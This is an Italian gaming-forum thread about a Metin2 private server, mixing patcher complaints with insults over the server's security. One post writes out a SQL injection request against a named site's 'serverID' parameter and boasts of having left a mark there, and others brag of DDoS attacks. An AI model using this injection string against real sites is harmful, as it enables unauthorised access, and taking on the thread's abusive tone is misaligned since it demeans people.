Follow along with the video below to see how to install our site as a web app on your home screen.
Nota: This feature may not be available in some browsers.
mmm dunque anche a me stesso problema dopo 3 ore di download una volta estratto il client e avvianto il RuinsPatcher.exe non carica gli aggiornamenti....ora va beh poco importa se siete abili fate una patch e via..
mentre spero che non ve ne uscite col dire " scaricate il nuovo client bla bla bal" altre 3 ore non me le faccio xD
guarda sono felice di sbagliare infatti xD per tra poco quindi intendete in serata? o domani mattina?Ti sbagli di grosso ^^
Tra poco sarà tutto risolto.
guarda sono felice di sbagliare infatti xD per tra poco quindi intendete in serata? o domani mattina?

Forza Ryuk

Giusto perchè ho letto "ricky92" e quell'altro coso di bacca001 mi metto in mezzo..
quali falle?quali xss? naturalmente è robba da newbie e ingrandita come sta facendo un cretino nel post..che sa trovare le xss da programmini per window e poi se le sbatte tutti sui denti...oppure quell'altro (o addirittura sempre lo stess "sapientone") che continua a ddossare il server....un semplice grab alle porte e si potrebbe reversare l'attacco
ma passiamo ai "fatti"..ovvero che il sito e il freebsd fanno schifo.
POST http://www.ruinsofdragon.it/home/index.php?pagina=add_session HTTP/1.1
Accept-Encoding: gzip
/index.php?pagina=rank&sv=1
"action=&serverID=52%22%20OR%20%2252%22%3D%2252&serverID=1&passID=FrAmE30.&loginID=3419"
Come vedete la vulnerabilità è nel "ServerID" .
Io personalmente ci ho gia lasciato un ricordino per fare i miei migliori auguri a ricky92 the best genio of ?
?? di cosa non lo so.....
D) e i newbie di allora ora fanno gli squali
IDIOTA VAI A STUDIARE ACCANNA METIN E IMPARATI QUALCOSA. BUON SCANNER NERD CON OBIETTIVI MEDIOCRI.voi siete indescrivibili secondo me....perchè non lasciate soltanto scegliere le persone dove giocare? ma cristo santo Metin2 è un GIOCO ? come tanti miliardi di giochi esistenti è giusto giocarli se poi fanno pietà o meno la gente lo capisce ...
Gioco= divertimento .
Lasciateci divertire e basta stop -.-
ogni minaccia che scrivono certi incapaci lamer mi fa ridere sempre di più..cioè sul serio?? volete mettere paura sul serio ai gf? Quanto potete dossare, mezz'ora??
Poi?? wow che paura..se riusciste a usare almeno una di quelle falle che "trovate" con il vostro intelletto superiore allora parlereste di meno e agireste di piu.
Per fortuna non avete un minimo di consocienza e neanche un minimo di cervello altrimenti andreste in giro a ownare e distruggere server (dato che l'unico bug è nel bsd e NESSUNO si è letto nemmeno un tutorial su come fixarlo)
2 anni che manco ma gli stessi idioti di una volta ora invece che vantarsi fanno i fatti (e a quanto pare fanno schifoD) e i newbie di allora ora fanno gli squali
PARLO AL PLURALE O AL GENERALE PER NON DARE IMPORTANZA A DEFICENTI COME "PROMISE" O COME SI CHIAMA...NON VORREI MAI INTRALCIARMI SULLA SUA STRADA! PERCHE DEFICENTI COSI PORTANO SOLO GUAI!!IDIOTA VAI A STUDIARE ACCANNA METIN E IMPARATI QUALCOSA. BUON SCANNER NERD CON OBIETTIVI MEDIOCRI.

ogni minaccia che scrivono certi incapaci lamer mi fa ridere sempre di più..cioè sul serio?? volete mettere paura sul serio ai gf? Quanto potete dossare, mezz'ora??
Poi?? wow che paura..se riusciste a usare almeno una di quelle falle che "trovate" con il vostro intelletto superiore allora parlereste di meno e agireste di piu.
Per fortuna non avete un minimo di consocienza e neanche un minimo di cervello altrimenti andreste in giro a ownare e distruggere server (dato che l'unico bug è nel bsd e NESSUNO si è letto nemmeno un tutorial su come fixarlo)
2 anni che manco ma gli stessi idioti di una volta ora invece che vantarsi fanno i fatti (e a quanto pare fanno schifoD) e i newbie di allora ora fanno gli squali
PARLO AL PLURALE O AL GENERALE PER NON DARE IMPORTANZA A DEFICENTI COME "PROMISE" O COME SI CHIAMA...NON VORREI MAI INTRALCIARMI SULLA SUA STRADA! PERCHE DEFICENTI COSI PORTANO SOLO GUAI!!IDIOTA VAI A STUDIARE ACCANNA METIN E IMPARATI QUALCOSA. BUON SCANNER NERD CON OBIETTIVI MEDIOCRI.

Purtroppo hai ragione
Hai sottolineato tu stesso che nessuno si legge come FIX il BSD.
Quindi non capisco cosa ci sia di male nel farlo capire in metodi non molto " normali " ma drastici.
Almeno così i player di un Server sono PROTETTI.
Invece di dire protezioni ecc ecc al massimo le solite ca**te.
Hai ragione dovrei fare qualcos'altro, ma fino a quando vedo questi certi server che aprono, TANTI player si fidano delle loro protezioni, ma sono ASSENTI, questo non mi piace e non mi è mai piaciuto.
In passato MOLTE se non troppe volte mi è capitato di dedicarmi in un server dove veniva sempre scritto : " Protezioni, ecc ecc tutto inpenetrabile, untouched. "
Per questo.
Sbaglio lo so.
è come dire: non mangio perchè dimagrisco.